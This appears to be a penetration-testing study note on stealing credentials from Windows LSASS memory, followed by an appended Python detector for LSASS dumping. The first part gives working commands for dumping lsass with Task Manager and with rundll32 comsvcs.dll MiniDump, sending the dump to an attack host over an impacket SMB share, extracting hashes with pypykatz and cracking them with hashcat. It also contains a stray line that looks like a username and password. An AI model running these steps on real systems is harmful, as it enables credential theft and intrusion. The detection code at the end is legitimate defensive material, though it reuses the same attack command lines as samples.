- LSASS is a core Windows process responsible for enforcing security policies, handling user authentication, and storing sensitive credential material in memory.
- **LSASS stores credentials for accounts that have an active logon session on Windows systems.**
- When we dump LSASS process memory to a file, we essentially take a "snapshot" of what was in memory at that point in time.
- If there were any active logon sessions, the credentials used to establish them will be present in the dump.
- Upon initial logon, LSASS will:
    - cache credentials locally in memory
    - create access tokens
    - enforce security policies
    - write to the Windows security log

# Dumping LSASS process memory

### Task Manager method

1. Open `Task Manager`
2. Select the `Processes` tab
3. Find and right click the `Local Security Authority Process`
4. Select `Create dump file`
5. A file called `lsass.DMP` is created and saved in `%temp%`
    1. This is the file we will transfer to our attack host.

![[Pasted image 20250701232519.png]]

### Rundll32.exe & Comsvcs.dll method

```powershell
# determine what PID is assigned to lsass.exe from CMD
tasklist /svc

# determine what PID is assigned to lsass.exe from PowerShell
Get-Process lsass

# With an elevated PS session, we can create a dump file
# 672 is the PID of lsass.exe in this case
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
```

### Transfer `.dmp` from target host to attack host

```bash
# attack host
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support share /home/wook/Desktop

# target host
move lsass.DMP \\<attack_host_IP>\share
```

### Using Pypykatz to extract credentials (extract from `.dmp` files)

- an implementation of Mimikatz written entirely in Python → allows us to run it on Linux
- Mimikatz → only available on Windows

```bash
pypykatz lsa minidump /home/wook/Documents/lsass.dmp
```

### Crack the NT Hash with Hashcat

```bash
hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt
```

vfrank:Imply wet Unmasked!
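Both dump methods above leave telemetry a defender can alert on: the `comsvcs.dll, MiniDump` command line, a file named `lsass.DMP` being written, and a handle opened to `lsass.exe` by a process that has no business doing so. The following is an added detection example (not part of the original note, and not tied to any real SIEM product); the log lines are constructed in a simplified key=value form loosely modelled on Sysmon Event IDs 1, 10 and 11, and the allowlist of images expected to touch `lsass.exe` is an assumption that would need tuning per environment.

```python
import re

# Constructed sample events (not real telemetry); EventID 1 = process create,
# 10 = process access, 11 = file create, mirroring Sysmon's numbering.
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\rundll32.exe CommandLine="rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full"',
    'EventID=11 Image=C:\\Windows\\System32\\Taskmgr.exe TargetFilename=C:\\Users\\alice\\AppData\\Local\\Temp\\lsass.DMP',
    'EventID=10 SourceImage=C:\\Windows\\System32\\rundll32.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF',
    'EventID=1 Image=C:\\Windows\\System32\\rundll32.exe CommandLine="rundll32 shell32.dll,Control_RunDLL"',
    'EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000',
]

# key=value pairs, where a value may be double-quoted to allow spaces
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Assumed allowlist of system images that routinely open lsass.exe; tune per environment.
LSASS_ACCESS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}


def parse_event(line):
    """Turn one key=value log line into a dict of field -> value."""
    return {key: quoted or unquoted for key, quoted, unquoted in FIELD_RE.findall(line)}


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a reason string if the event matches an LSASS-dumping pattern, else None."""
    eid = event.get("EventID")
    if eid == "1":
        cmd = event.get("CommandLine", "").lower()  # rundll32 export names are case-insensitive
        if "comsvcs" in cmd and "minidump" in cmd:
            return "rundll32 comsvcs.dll MiniDump invoked"
    elif eid == "11":
        if basename(event.get("TargetFilename", "")) == "lsass.dmp":
            return "lsass.dmp written to disk"
    elif eid == "10":
        if basename(event.get("TargetImage", "")) == "lsass.exe" and \
           basename(event.get("SourceImage", "")) not in LSASS_ACCESS_ALLOWLIST:
            return "unexpected handle to lsass.exe"
    return None


def scan(lines):
    """Scan log lines and return (reason, offending image) for each hit."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reason = classify(event)
        if reason:
            hits.append((reason, event.get("Image") or event.get("SourceImage")))
    return hits
```

Running `scan(SAMPLE_EVENTS)` flags the MiniDump command line, the `lsass.DMP` file write from Task Manager and the rundll32 handle to `lsass.exe`, while the benign rundll32 and csrss events pass.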